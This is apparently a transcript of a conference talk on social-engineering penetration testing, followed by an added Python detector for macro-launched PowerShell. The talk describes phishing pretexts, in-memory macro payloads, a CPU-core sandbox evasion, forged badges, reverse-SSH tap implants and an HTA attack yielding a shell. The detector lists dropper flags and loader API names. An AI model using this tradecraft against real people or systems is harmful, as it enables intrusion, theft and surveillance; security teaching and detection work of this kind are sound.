So anyhow, I don't think this guy needs any more introduction, but Dave Kennedy was like the CISO for a Fortune 100, left that to start his own business, and now has a really awesome team doing penetration testing and all sorts of other fun stuff, and he's going to talk about some end user attacks, so everyone welcome Dave Kennedy. Thanks, Chris. Appreciate everybody coming. This talk is always fun because I get to kind of go through a lot of the different war stories that we do and what works and what doesn't kind of out there. Just a brief history, I started TrustedSec and Binary Defense. If you look on the right-hand side, when we hired a new employee, Justin, I decided to be funny and told him that he had to kind of come into work and dress up to work the first day, and we all end up dressing up as different costumes, and I end up dressing up as like Batman or I was a Ghostbuster, that's right, and then one of the guys on the left decides to dress up as Pennywise the clown, and I didn't know it until I was driving down the street to go to my office and look over to my right and he's right there, and this car is right next to me and he's just smiling like this, you know? It's one of those things that jacks you up and you never get over it, it's just, I don't know. But I'll go into some of this other stuff, but for me, when you look at where we're at today, if you look at a lot of the attacks that are happening out there, they really are originating from the human element or going after individuals.
And it's funny because when Chris decided to start social-engineer.org, before he even started his own company and those other things, Chris and I were in a chat room in IRC, and this is kind of how the Social-Engineer Toolkit and everything else got kind of started, and Chris and I were good friends and that's a whole other story in itself, how we became friends, and actually the heat store, the heater story, he was mad at me and wouldn't even talk to me, and this was like a sign of offering, I was going to take him out to dinner and apologize for everything, that's when I had modified the seats to my car to burn his rear end. So that was like our peace offering and then I ended up burning his rear end. So we ended up becoming really good friends that way. Well, the funny part about Chris is he starts, he's like, oh my God, he starts hitting the X button to close out real quick and he closes his IRC chat room, right? And so he comes back in like 15 minutes later and he's like, I don't know who that was, but some real big idiot was on this website and he sent me this really bad website, dude, don't worry, we kicked him. Everything's fine, just go to this other website and it'll help you out. Right, got him a second time. And then we were at ShmooCon and you know, Chris wanted to beat me up and I'm like, Chris, listen man, I'm sorry, I didn't have kids this time, I'm like, hey man, I got kids and everything, I'm like, here's a picture of him and it was the same site and then I ran away, you know, so that's how Chris and I became good friends. But I homed in, I knew Chris was a special case and I needed to home in on him and treat him a little bit differently than others. But you know, what's interesting with all of that though, you know, Chris was in a chat room and he was like, hey man, I really think that social engineering and coupling technology is going to be a real big thing and this is like 2006.
And I'm like, yeah, I agree with you, let's start like a little thing together and let's like figure out social-engineer.org and we can kind of get a group going and that's kind of how SET ended up becoming created and that's how we created the Social-Engineer Toolkit. And so it's interesting to see how all of these attacks have kind of evolved because if you look at the past year and a half, the majority of them come down to phishing, they come down to targeting individuals and human beings and it's really a successful endeavor and it's really, if you look at an attack, it's a really low, I don't think I can go that far over, it starts ringing. Attacks are a low investment, high impact of what you actually do. So you don't need someone that's heavily sophisticated or somebody that's really good at what they do as far as attacking. You have to be a zero-day researcher. You can get everybody the way that you want to right now and it's pretty easy to do. And I'm going to show you a demonstration and if you've seen this, I apologize. But it's a thing that I did on the Katie Couric show and it's really resonant because literally I was going on the Katie Couric show and Katie asked me, she's like, hey, can you just hack somebody live in the audience and then we'll videotape their reaction? You know, me being a hacker, I'm like, heck, yeah, I can. I'm going to steal all of her stuff and I'm going to do this. I'm going to grab her social security number and all of that. And I was all happy and excited about what I was doing but I didn't really realize the impact that it had on this individual. So I'm going to show you a quick demo of what I did on the Katie Couric show. And just a heads up, so who you're going to see is Big Dave. I'm Little Dave. I've lost about 115 pounds since I last went on the Katie Couric show about a year ago. So this is Little Dave. Thank you. It's amazing what eating less and working out can do for you. Turn it up. I caught him sleeping.
Can you get up a little more? I understand that you believe your computer is unhackable. Why? She has two teenage daughters. She lives in Connecticut. And Stephanie, I understand that you believe your computer is unhackable. Why? Well, it's something that's really on my mind. I'm very concerned about it. I feel like all of my antivirus software is up to date. I've taken a lot of precautions. I have a computer consultant who comes into my home. So first of all, does anybody you know in your family have a computer consultant that comes in their house to make sure you have a couple? Wow, that's amazing because I never heard of one. I'm like, Katie picks the only person in the world that has a computer consultant that's going to lock her computer down. So I'm like, all right, I've got to start whipping out some zero days or something like that for this one. But we'll see. To check on these things. And so I really feel strongly that we have done everything possible to try and protect myself and my daughters. I mean, it's something that's really worrisome for me. Well, that's very impressive because you seem like you're extremely ahead of the curve. So we decided to put David to the test to see if your comfort level with your security is actually warranted. Tell us what happened. How did you do when we gave you the challenge of? So right there, you know, so to kind of show how I feel at this point in time because I'm confident in what I'm doing. Actually, I got a little, little video. I can show you how I feel and I like a little animal meme. So this is a good one here. It's kind of how I felt at that point in time. That felt pretty good, right? To Stephanie's computer. So, you know, Stephanie, I would say it was actually one of the top 5% of what I would say is being most secure. You know, everything up to date, really locked down, all of those good things.
And so I literally had plugged in, opened my computer up and less than 10 minutes or so had a fully designed website that looked real in every way and shape or form of a website that you would visit every single day. And I sent an email out and as soon as I sent the email, it looks very believable in every way. She clicked the link and then from there, again, less than 10 minutes of set of time and hacking and all that stuff. I had full access to her computer, her webcam, got around all of her antivirus, everything completely. You are kidding me. Wow. So, you know, as a hacker at this point in time, I'm like, I'm still doing, you know, I got everything, right? You know? And then I don't even think about what I'm doing. I'm just like, hey, I own everything you have here, you know? So, tell us, oh my gosh, that you were able to see. Well, the first thing we did is we enabled her. Why not enable her webcam? It's buying her house. We enabled her webcam. We were actually able to monitor everything that was going on in her house. Everything from her daughter working on her computer to Stephanie actually walking through the house itself. We actually enabled the audio as well. So we enabled our audio and turned to a tap device as well too so we can listen to conversations. It sounds all good. We hear everything that was going on at the same time. So we can listen to conversations. From there, you know, we started looking at a lot of... I won't let it keep going. It gets worse. But to say the least, you know, that was one of those moments where, like, you know, you realize, like, how impactful you are as an attacker and, like, the effect it can have on an individual. And, you know, the thing is, you know, for me to attack Stephanie, it took about 10 minutes of time. You know, literally, I went on her website. I checked, you know, her Facebook profile, her Twitter profile. 
Saw that she, at one point in time, like a year and a half ago, made a mention about an Amazon package delivery. So I just, you know, cloned Amazon's website. You know, I made a quick, you know, package distribution page and I sent her an email saying, hey, you know, Stephanie, just so you know, your package was rerouted due to a, you know, inclement weather changes or whatever. Please click here when you can schedule a new delivery. And as soon as she clicked, the link can compromise her computer, right? So it took about 10 minutes to set all of that up and hack her stuff. And it's something that is, you know, may seem stupid, but it works really well because I know that she shops on Amazon, right? So whenever you can establish some sort of trust with somebody, you have the ability to attack them in some way that is very personal that they expect. And that's what attacking humans are all about. It's about going after them in a way that you create a fantasy that's completely ridiculous, but it's believable to them. And what was interesting is so you'll see something that's coming out soon with CNN and it's not public yet, but I did a live hack on, you know, where I went after a company and the company gave me permission to do this. But I did, you know, I called the help desk up and I spoofed my phone number coming from inside of the company and I said, hey, just so you know, I'm having this weird problem getting to this website for this specific site itself. And they're like, oh, how can I help you because it's the help desk supposed to help, right? Like, can you just go to this website and make sure I'm not an idiot, you know, and that it's not my computer? And it's like, yeah, what's the website? And I just go, you know, www.whatever it was.com. As soon as they go to the website, it compromises the machine and I have full access to that help desk person's computer, right? But that's what they're designed to do. That's their function is to help. 
So if you can attack somebody in a way that is believable to them, that is understandable to them and it doesn't trigger any barriers or misconceptions around something that's wrong, then it works, right? And it works really, really well. The things that you run into is when you don't spend your time to research a company and go after them and you just do something that's like, hey, health benefits or hey, this or that, you actually got to spend some time looking at who you're going after on the target thing and I'll talk about that. And I got a cool example of one we just did recently which is really neat. So, you know, the premise of social engineering attacking humans is make something that's so believable to them that they're going to believe it and that it's not going to trigger any alarms, right? And really it just comes down to normal human behavior. If you're like, hey, I'm a Nigerian prince, you need to get $10 million if you click this link, no one's going to believe that, right? It's ridiculous, right? However, if I do my research on an individual and I know that they're in a big organization, perfect example, sales, right? Actually, you don't even need to do research on sales, right? You can do anything you want to the sales. Like, hey, I'm going to buy from you. I got like $5 million. Can you tell me what antivirus you have? Well, that's kind of weird, but yeah, I'm using Symantec. Oh, that's cool. Can you just type a couple commands and tell that to this? I'm still going to get the sale. Yeah, yeah, absolutely. Okay, cool. What am I doing here? Okay, yeah, okay, sweet. Hey, flag of virus. Oh, just right click and hit the save. Okay, cool, I'm still getting the sale, right? You know, it's interesting with people you target specifically, especially like sales. Like, if they're an organization that's business to business, like going out and talking to other businesses, creating a fake business that's in their demographics and their market is perfect. 
Like, create a fake website that looks like a business that they would sell to. And then you call them up and you're like, hey, bro, I got $15 million and I got my QN, my Q3Ns. I got to burn this $15 million in three days. Is there any way you can work with me? Yeah, absolutely. Everybody drops. You got the whole sales support staff. You're like, boom, phish him, phish him, phish him, show, show, show, show, show. You got the whole support staff just compromising everything, right? So you have to build your attacks off of a way that's going to be believable. I'll show you an example here in just a second of some things that we did. And for us, being a hacker is really about being and thinking outside of the world. When I first started in this industry, right, I started on that zero day route, just like building exploits and bypassing ASLR and DEP and ROP and all this other stuff. And I still do some of that, but it's hard. Like building exploits nowadays, if you don't focus on it, it's really hard to do. For me, social engineering is that same type of excitement and fun because it requires you to put a puzzle together to figure things out in a way that you went before and come and figure out how you can attack somebody in a way that is unique. And it's literally like crafting your own zero day, right? It's like literally trying to get around ROP and putting a puzzle together because you have to put a puzzle of a human being together, which is way more complex. I mean, human beings act so crazily different depending on who you are or demographics or southern accents or British accents or females. You saw women have a much higher probability in social engineering and destroy based on culture. There's so many different things and variables that there's an industry to do that because that's exactly what the attackers are doing. And you know, what's interesting about pen testing, right? You hear a lot about pen testing and pen testing and pen testing.
The thing about pen testing is that it doesn't really simulate an actual attack against an organization. It's like, hey, we're going to compromise this thing and then we're going to get domain and then we just owned everything and we're going to report on how we got domain and here you go, boom, right? It doesn't simulate an adversary, right? Forget about that one. Sorry, I forgot about that one. It's the only one in there that's bad. So we have to move more towards what we call objective pen testing to me and that's really trying to understand what the business does, how they operate and how can I attack them. For example, manufacturing companies. Does anybody here do work for manufacturing companies or work in a manufacturing type organization? Is the actual product they make what's sensitive to them? No. But how they built that, the process of manufacturing, the compounds in there, the suppliers that they source it out to and the hundreds of years that they take to mature the specific product, that's the intellectual property and that's what they're going after right now. Same thing for, let's just say retail. Credit cards and customer information is number one, right? That's a given. We start going into other demographics like medical research or, you know, the SCADA infrastructure and energy sectors and things like that, right? Every single organization is unique in their company, so it requires us to actually attack them in a different way that makes it some way in shape or form, simulating what's actually going to happen out there. So I talked about this, but you know, if you look at what's kind of happening in the media right now, this is what's, I guess, the scariest thing to me is that companies that have neglected security forever, right? Now can claim that they were hacked by China and that it was sophisticated and all of the years of neglect, they now have been out, right? So we haven't funded security for 10 years.
We haven't given it the right path and it hasn't been structured in our organization and some folks phished us with the most horrible phish ever and we fell for it and all we have is antivirus on our endpoints and that's it. And we get compromised, it was a sophisticated attack and we're not to blame for this. And that is a big issue for the security industry because it's not going to mature us and make us better. It's just another thing that we can blame and we can't actually look at most of the attacks that have happened. There are sophisticated attacks that happen out there, there's no question about it. You look at like the Sony stuff with North Korea, right? North Korea, that stuff, that malware was pretty rudimentary. It dropped like six or seven different types of pieces of binaries on there. It looked like something out of like 1982. So if you can code like four lines of bash, you're now a sophisticated attacker in today's world. But it's everywhere. It's not Sony's fault and it crucks forward in a way to blame other things that happen. And we didn't really see that with something like Target, right? Target, you know, they had the executives fired and everybody else out there because they lost all their credit card data. Even though they probably had a much better security program than almost anybody else out there at the time. So it's a different type of world we live in now because we can just blame things on attackers. You can blame things on someone being sophisticated and it doesn't necessarily make a change. Now I'm going to show you some cool stuff too. But we went after a manufacturing company recently. It was what we call a red team engagement, right? So it's like no holds barred. You can do whatever you want to. When I say whatever you want to, it's not like you can like walk up and hold somebody up at gunpoint or anything, but it's like you can pretty much do anything you want to. Aside from like breaking stuff, probably not a good idea.
But the main focus of this was the focus on their next generation product line or their R&D stuff, right? So what they're going to be doing in the future. And we had been doing work for this company for a long time protecting their IP and focused on protecting the research and development of their next-gen products. So it's really, really important to them to see if we can actually get access to it. And so we had any method that we could possibly use, right? We could do physical, we could do social engineering, we could hack anything we want to. We can do whatever we want to. It was a full scope, right? A lot of us would do any type of thing that we wanted to actually do. And so what we decided to do is, you know, hey, maybe we can go phishing first. But before we do phishing, maybe we can look at how we're going to help us out with it. Because in order to get to some of these people, we're going to have to get pretty deep. And so we started looking and we found an actual web application that had a file upload vulnerability in it which allowed us to compromise a website, okay? We compromised this website, but we didn't really have permission to do anything. It was like, you know, kind of locked in its own DMZ, didn't really, couldn't do any type of lateral movement or attacks or anything like that. So it was really difficult for us to attack the system. But what we could do is create our own web pages. And so we could create a web page on a company or organization's web page, right? Which does what? Trust and credibility, right? So establish this credibility and trust for a specific website because we have already owned the specific website. So what we ended up doing is we made this whole website and we sent it out to a couple of individuals in the sales department. And we ended up getting one of them like almost right away. So, you know, we had to log into this website, right? And we grabbed credentials.
We didn't want to trigger anything yet, so we didn't like go for compromising a system because we didn't know what defenses they had in place. And so at this point in time, we had to figure out a way to actually go and attack them. And what we did is, you know, we, you know, phished them with this specific phish, along with username and password and it was like a server they went through and did certain things. So it's great about Outlook Web Access. For some reason, corporations, they'll do two-factor VPN. You know, so if they do like a one-time PIN or something for VPNs. But OWA for some reason is like always open. There's never any two-factor authentication, which is horrible because it has access to all of your, you know, email and Exchange data and everything else that's going on. And so it was interesting with this is when we compromised the sales individual, somebody know what happens when you compromise an OWA infrastructure, like just a one user. Even more trust, right? Because you have conversations with people that have already been talking to you. So usually what I do when I compromise OWA is I'll sit there for like two or three hours just reading three emails. Just seeing which one is the perfect one for me to be able to send something back to them, right? And send something that's good for me, but not like what I did to Chris. But, you know, send something back to an individual sales person that establishes another part of trust and compromises the machine. And so, you know, what we had to look at is, you know, end up doing what was called an Excel injection. And I'll show you a quick demo of this really quick. Now, is anybody familiar? Has anybody used the tool Unicorn before? Couple people, it's great. If you haven't seen it, the new version 2 is out, which came out about two or three weeks ago. And it has a lot of new attack vectors in it, improved optimization of code.
Metasploit, they got a much larger payload, so that whenever you generated payloads within Metasploit, it became much larger. And if you know anything about PowerShell injection, you have to keep it kind of small and compact and certain things. So I was able to strip out a large percentage of the new payload systems and so it's all in one. But if you're not familiar with PowerShell, so to put it in perspective, like every new operating system from Windows Vista and above has PowerShell installed on it. And PowerShell is a very specific type of attack vector because it allows you to basically do direct memory access and inject shellcode directly into memory through PowerShell, which means that if you're using something like a Bit9 or application whitelisting, you can circumvent that really easily and just inject your own shellcode there and never touch disk. And so I ended up creating Unicorn, which allows you to attack 32 and 64 bit platforms natively with it. And so one of the attack vectors that you can do now is through macro injection, which was like some individual added it through a git pull request, which is really cool and I've improved it since then. And what's nice about this, I just want to show you real quick. So any new hacker tool, by the way, has to have ASCII art as far as I'm concerned, so this has an awesome... It was funny, I was teaching my Black Hat class and one of the students was like, it'd be awesome if the Unicorn had red eyes. So at break time I coded in red eyes, so it's all fun. But Unicorn, what it does is it allows you to generate a number of attacks. And so one of the ones that we're going to run really quick is the macro attack. And so first we need a payload. So we're going to specify like Windows Meterpreter reverse TCP. And I'll just give it any type of IP address that I want to. And then I'm going to specify macro, port macro. And it's going to go ahead and generate the code for us.
And I use this all effectively, especially if you have a trust relationship. And so I'll go ahead and edit this. And it generates macro code for you that does PowerShell injection natively. So when they open up the Excel document, it doesn't touch disk, it doesn't download anything else, it just injects shellcode into memory for you. So it compromises the system and it gets around a lot of the application whitelisting type technology. And by the way, if you're using what's called execution parameter, so it gets around any type of execution restriction policies that you have in place too. So if you're using AllSigned or RemoteSigned or anything like that, it doesn't make a difference. And so that'll work. You execute that, it compromises the machine and then it gives you a shell out of the network, which I'll show you a demonstration here in just a few minutes. But it works extremely well. It's effective where I use a lot of the social engineering techniques. But what's interesting though is I ran into a specific virtualization technology and I'm not going to talk about which one it is because I don't necessarily like bashing vendors or anything like that. They all do what they can. But I ran into a virtualization technology. Does anybody know how those type of technologies work? A piece of malware comes in or something comes in and it doesn't look normal, right? They spin up in a virtual machine, right? And that virtual machine then looks at everything that's occurring. So it doesn't make changes to the operating system for persistence or other areas. It's a neat technology. So I ended up sending this Excel document to the sales individual and all of a sudden it didn't work and I couldn't figure out why. And I was looking at it and I could see the initial connection but then after that it just died and it wasn't coming from the actual computer. So I'm like, they're using some sort of virtualization technology. So I need to take a look at how to get around that.
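The macro-to-PowerShell chain described above (Excel opens a document, the macro launches PowerShell, the script injects into memory without touching disk, and execution policy is bypassed on the command line) leaves a distinctive parent/child process trail that endpoint telemetry records even though no file is written. The following is an added detection example from the editor, not code from the talk or from Unicorn. It assumes a constructed `Key=Value|Key=Value` log format whose field names (ParentImage, Image, CommandLine) are modelled on Sysmon Event ID 1; the sample events and the loader stand-in string are constructed, not real telemetry.

```python
"""Flag PowerShell launched by an Office parent with dropper-style switches.

Added example, not from the talk. Input is a constructed Key=Value|Key=Value
process-creation log whose fields mirror Sysmon Event ID 1.
"""
import base64
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe"}

# Command-line switches typical of macro droppers: regex -> reason label.
SUSPICIOUS_FLAGS = {
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s": "encoded command",
    r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b": "execution policy bypass",
    r"(?:^|\s)-(?:w|windowstyle)\s+hidden\b": "hidden window",
    r"(?:^|\s)-(?:nop|noprofile)\b": "profile suppressed",
}

# API names an in-memory shellcode loader has to reference; seeing them in a
# decoded script body is a strong signal that nothing will touch disk.
LOADER_MARKERS = ("VirtualAlloc", "CreateThread", "DllImport", "Marshal.Copy")


def parse_event(line):
    """Turn 'Key=Value|Key=Value' into a dict (constructed log format)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -EncodedCommand argument, or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        # PowerShell expects base64 over UTF-16LE text.
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_event(event):
    """Reasons an event looks like macro-launched PowerShell; empty list if benign."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return []
    reasons = ["Office process spawned PowerShell"]
    cmdline = event.get("CommandLine", "")
    for pattern, label in SUSPICIOUS_FLAGS.items():
        if re.search(pattern, cmdline, re.I):
            reasons.append(label)
    decoded = decode_encoded_command(cmdline)
    if decoded and any(marker in decoded for marker in LOADER_MARKERS):
        reasons.append("decoded script references shellcode-loader APIs")
    return reasons


def find_suspicious(lines):
    """Run assess_event over raw log lines; return [(line_index, reasons), ...]."""
    hits = []
    for i, line in enumerate(lines):
        reasons = assess_event(parse_event(line))
        if reasons:
            hits.append((i, reasons))
    return hits


# --- constructed sample data (not real telemetry) ---
OFFICE16 = r"C:\Program Files\Microsoft Office\root\Office16"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Stand-in for a loader script body; only the API names matter for detection.
LOADER_STUB = "# constructed stand-in: DllImport kernel32 VirtualAlloc CreateThread"
ENCODED_STUB = base64.b64encode(LOADER_STUB.encode("utf-16-le")).decode("ascii")

SAMPLE_LINES = [
    # Excel launching hidden, policy-bypassing, encoded PowerShell -> should fire
    f"ParentImage={OFFICE16}\\EXCEL.EXE|Image={PS_PATH}|CommandLine=powershell -nop -w hidden -ep bypass -enc {ENCODED_STUB}",
    # an admin running a script from Explorer -> benign
    rf"ParentImage=C:\Windows\explorer.exe|Image={PS_PATH}|CommandLine=powershell -File C:\scripts\backup.ps1",
    # Excel spawning the print-spooler helper -> benign
    rf"ParentImage={OFFICE16}\EXCEL.EXE|Image=C:\Windows\splwow64.exe|CommandLine=splwow64.exe 12288",
]

if __name__ == "__main__":
    for idx, reasons in find_suspicious(SAMPLE_LINES):
        print(f"line {idx}: " + "; ".join(reasons))
```

The parent/child pairing alone is the high-value signal, since Office applications have very few legitimate reasons to launch PowerShell; the switch and decoded-body checks only raise confidence. Running the block prints one hit, for the first sample line, with all six reasons.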
So if you want to look at some of the other elements, but I'm releasing this today for you all so you can see how to get past sandbox technology in all of them which is great. And it's extremely difficult. So I'm going to show you all of the code right here. Just kidding, it's not really hard. It's three lines of code to get around virtualization technology but it's actually really bad. It's terrible. So the virtual machines all use very predictable sandbox containers, right? And a lot of them, a lot of the big ones are less or usually just less than one. So does anybody you know use one CPU core at all in your environment? No, right? So if CPU core is less than two then just don't do anything and exit. So when it comes into these sandbox technologies, right? It's like, hey, hey, hey, are you doing anything? Oh, I'm in one CPU, don't do anything. Oh, you're not doing anything. You're good. Pass it off to the end user. It's cool, right? And they're like, oh, it came through this virtualization technology environment. Okay, run the code and execute. Good, I got my shell. So yeah, it works for pretty much any major one. What's interesting and the reason why I talk about this, by the way, is it's now being baked into a lot of the malware that you see out there today. Like I know Dyre came out with it and now Dyre actually has it built into the malware itself so it actually looks for sandbox environments and does it. There's a whole bunch of different ways though to get around virtualization sandbox stuff. They've gotten a little bit smarter on that. The CPU core counts are extremely easy and it works almost every time. There's a few other ones too. So what was cool about that is we got past the virtualization technology and we compromised some boxes. And we bypassed the sandbox technology. We ended up looking at a lot of different areas that we can get in Excel injection and it ended up working for us with the PowerShell injection which was awesome.
So we got most specifically one that we were specifically targeting that we really liked. So what's interesting about this attack is they use proper network segmentation which is really interesting to see. Most of the attacks that you see out there today is due to one person becoming compromised or maybe a couple people becoming compromised. And then that whole thing you hear about lateral movement. So they compromise one machine and they spread out the rest of the network with information that you have in M&M syndrome. They're hard on the outside and soft on the inside. So once you get past that hard exterior and you go to the inside and you now have the ability to touch all the systems that you want. What was interesting about this company is that they actually did pretty decent network segmentation. So it was really hard for me to even touch any of the individuals that were part of R&D. I couldn't even get to the R&D people that I needed access to let alone get to the information that I needed to. So one thing I noticed is that when I was going through and attacking, one of the VLANs I was able to get access to had the physical security system on it. If you don't know much about physical security systems, the physical security manufacturers are so far behind the logical, I guess, folks that usually breaking into physical security systems are really easy. And usually physical security guys don't handle good security practices in a lot of cases. So we ended up getting into this as their physical security website for the company. And it listed how to make a badge. This is step one. So I go to this website, enter this username in, enter this password in, and I'm in this badging system. And it's like, next if you need to create a new employee, make sure you sign the rules that you need access to. So I created myself a badge, so David Kennedy gets a badge. And I'm like, oh, I need access to R&D. Oh, it has a pin? I'm going to select all of this. 
So I added all of this and everything. And it said, usually the badge will print and everything and be ready for the new employee to pick up usually within an hour or two, something like that. So I waited a day. And so I dressed up. You know, it's live footage. But I ended up dressing up. When you go to an organization, you want to play the part. You want to play who you're going to be going after. You don't want to arouse any suspicion. So this company specifically was more of like a tie type of company. So I had to wear a tie and everything. And I walk up to the front desk and the security guard is sitting there and everything. I'm like, hey, I'm a new employee. I have a badge. My name is Dave Kennedy. He's like, oh, here you go. Here you go, Dave. Here you go. Sweet. Thank you. So I badge and clip on. Exit in and I'm walking in the building. It's great. So so far so good. I'm at the point where I wanted to get in. And so I started walking around and kind of trying to find different areas and trying to see if I could find the R&D area. So I find the R&D thing. And companies try to promote what they're doing as far as research and development. So there's this R&D center of excellence and it's like tinted windows and security access and all that stuff. And so I get to this area here and I'm going to tie in everything and I get to this R&D center of cool. I'm going to go in here and I'm going to try to get into this environment, this network segment so I can hack the rest of the information I need to get access to. And so I walk in there and I don't know if you've ever been in a situation, like the clown situation where I walked into a bunch of clowns, right? Like you don't belong. Like I should not be in this room where there's a whole bunch of clowns, right? Same thing that happened in this one. I ended up badging at my pen and I walk in and they're all looking at me like, who are you and why are you here? So at this point you have two choices, right? 
You're like, well I can just back off and pretend nothing happened. Oh, I'm sorry, wrong room, wrong room. Or you're like, let's see what happens and walk in. So I'll walk in and I just kind of go to the side a little bit and everybody's kind of looking and they go back to doing what they're doing, just standard business or anything. I guess they figure if I have access to this on the individuals and ended up not seeing a trash can that's sitting there and I'm walking and I trip over this metal trash can, right? And there's like, you know, there's like mustard all over me and food and everything and I literally hit it hard. Like I mean I hit it and I'm like rolling and being 6 foot 4 and being like, you know, starting to get into my mid 30s, when you fall hard, you fall hard, right? And you're sore for like honey, I had a rough day at work saying she's like, I thought you're a computer guy. Why do you have bruises everywhere? I'm like, you have no idea what I've been through. No idea. But you know, what's funny is I made this huge noise in all this trash everywhere. People pick me up and everything, like oh my gosh, are you okay? I'm fine, I'm fine, I'm fine, I'm just going over here to try to get over here. Like, okay, I'm so sorry this happened. We'll move the trash can to our fault. I'm like, no, I'm going to get over to the side and I see a computer there and I'm going to be open sourcing this next week. And it's what I call it, it's what we call our tap devices which if you're familiar with like Intel NUCs, little NUCs, you can buy them for like 200 bucks or something like that. You go and you buy one of those and you get like a 128 gig solid state drive, give it about 8 gigs of RAM and then you can also buy an LTE card for it. And so that will automatically establish a reverse SSH VPN and Jeff also one of our guys is also back there, right Jeff? Also wrote the SSH VPN part of it so I can't take all credit for that.
But it basically establishes a reverse SSH connection out of the LTE network while bridging the other network that might be air gapped and then it does a reverse SSH connection and then you can VPN full tap device through an SSH connection into that environment to get around it. It's nice about the tap devices and what I built is it's kind of like self healing so if there's problems with the operating system or the connection it tries to repair itself so they can get back out again. So like something goes wrong and tries to fix itself and restore itself back to its original content. So I'll be releasing that. I've been working on it for actually about a year and a half and I figure why not just open source it. But that's kind of how that works. Now what's interesting with the implants themselves, you know when I open source the code is it will literally, we've never seen it fail in an environment that we get physical access to. So it can do things like impersonate the network that it's going on to automatically clone a MAC address so that you can get around a lot of the 802.1X. Also I'm working on right now a module for it where it'll actually sniff for printer MAC and one of those so that it gets into like the printer VLAN so you can at least get some access into an environment that may not have 802.1X in place. So there's a lot more stuff that I'm adding to that which is really cool. I want to show you a quick demo here real quick. Then I'm going to ask is Chris still around? I got a demo for you. I want to check real quick here. Do I have your permission first? Can I get your permission Chris? I need your permission Chris. I'm first year you're wrong. Well wait a minute. I got a demo here to do first. I have to see if I can get to it but we'll try. So one of the attacks that I use a lot in social engineering is through the social engineering tool kit. And if you've used SET, SET is just a tool. It's just a tool that can help you in what you're doing.
If you're just running SET to run a tool then you're not going to be successful. However, if you actually are going to be successful in how you do it. One of the new attack vectors that I added into the social engineering tool kit and special thanks to Justin Elze for leading me on to this is what we call the HTA attack. If you're familiar with most corporations they still traditionally use Internet Explorer. It's kind of their main method for browsing. Compatibility, Oracle, everything else that comes along with the horribleness of Internet Explorer. So what you can do and this works in Chrome is you want to use this in IE is what we call HTA files. And HTA files are a separate launcher that gets added to Microsoft and it gets called. And it's kind of a similar problem that we saw with Java applets in the past. If you're not familiar with Java applets it's a way of basically compromising a machine very easily if you have Java installed. It doesn't matter what version, doesn't need to be zero day or anything like that. It just always works. But in this case I'll show you how easy this is. And this is version 6.5.2. It just came out recently. What's interesting about this version is I named it Mr. Robot. Have you ever seen this show Mr. Robot? Yeah. Good stuff, right? What was interesting is I was literally in bed sleeping. I had Mr. Robot recorded and I'm like in bed and I'm all snuggling and I got my comforter on and I'm just getting ready to fall asleep and all of a sudden my phone starts ringing and I guess the social engineer tool kit was on Mr. Robot. So I actually used Mr. Robot to hack into someone's computer system through one of the SMS spoofing attacks which is kind of neat. So I actually got to see my tool used in a TV show on hacking into things. So I named my next version Mr. Robot in honor of an awesome TV show which is really sweet. But we're going to hit number one social engineering attacks. And then I'm going to hit number two HTA attack, number eight.
And so this is a new attack vector that's in there right now. And then it's going to ask me for what my IP address is. So if I was actually doing this on the Internet I would give them my external IP address. And what port I want to payload. I'll use Meterpreter, reverse TCP but you can use whatever you want to. Now we're doing this attack right? What I usually do is I'll use something like, everybody use RAR before. Great tool. And what it does is it sweeps a whole externally facing network looking for websites, right? And if you hit a customer's website and you look for those specific ports you can see the website that's out there. You can start to kind of get an idea of what maybe what type of pretext you're going to use for an attack. And so you can kind of sweep the network looking for a different website that may look somewhat believable that you might want to clone. And so I go after that company's website, clone 2. And I'll go ahead and just clone TrustedSec as an example. And it's going to clone the website. It's going to automatically generate the PowerShell injection code. It's going to automatically wrap it out and create everything for you in a web application for the website. And then it's going to launch Metasploit for you for an actual listener. So it'll do all that for you automatically. And then we're ready to go for our attack. Well, next I would, you know, run a pentest in. Well, I got to update you out of the loops. This is my hack box anyway. I don't care. And, you know, the customer was like, man, this is never going to work, right? This isn't going to work. No one's going to believe this. He had more shells coming in that he couldn't even type in sessions to interact with the shells because too many shells were coming in at a time. I think he had like 94 at the end of the day from the specific one. So I really only recommend targeting like one or two people at a time. Just wait. Like send it to like one person and just chill.
Grab a beer or a Diet Coke or water or whatever you're into. And just wait for that person to actually click on something before you compromise them. Because I mean, if you're targeting one person it's a much less probability chance of actually getting attacked or detected in that type of case. So wait for one person and kind of wait and wait and wait and then wait. So I'm going to go to this website and let's just say I sent a pretext out or whatever it ends up being. There's a million of them that you can come up with. Ha ha, get Windows 10. Nope. We'll go to this website. And you get prompted for a quick open, right? And so if you build this in your pretext it's great. When you go to a website you may say, hey, when you get to the website you need to open the content to validate who you are as an organization or whatever. And this warning banner is great from a trust perspective because it's saying it's signed by Microsoft, right? The author is Microsoft publisher and it's wanting you to open up this application. Would you trust this? If it's signed by Microsoft it probably would. Most people would, right? Now as soon as you hit allow, oops. Over here. Give it a sec. PowerShell injection takes a second. And there we go. We get our shell. So it's a very effective attack. You can use it pretty much on any build of Windows. If you're going after a company that's using more Linux or OS X I move more towards credential harvesting type attack to get more from them because it's a little bit harder to pop them. Most companies don't install Java for OS X by default. Java is uninstalled by OS X which is great. So in a lot of cases if you're targeting Windows specific platforms the HTA files are the way to go now. Java exploitation is really good as well. One thing I'll say really fast is I'll couple this attack with what we call Web Jacking. Anybody used the Web Jacking method before? This is the worst one ever. In a good way for us but bad for people.
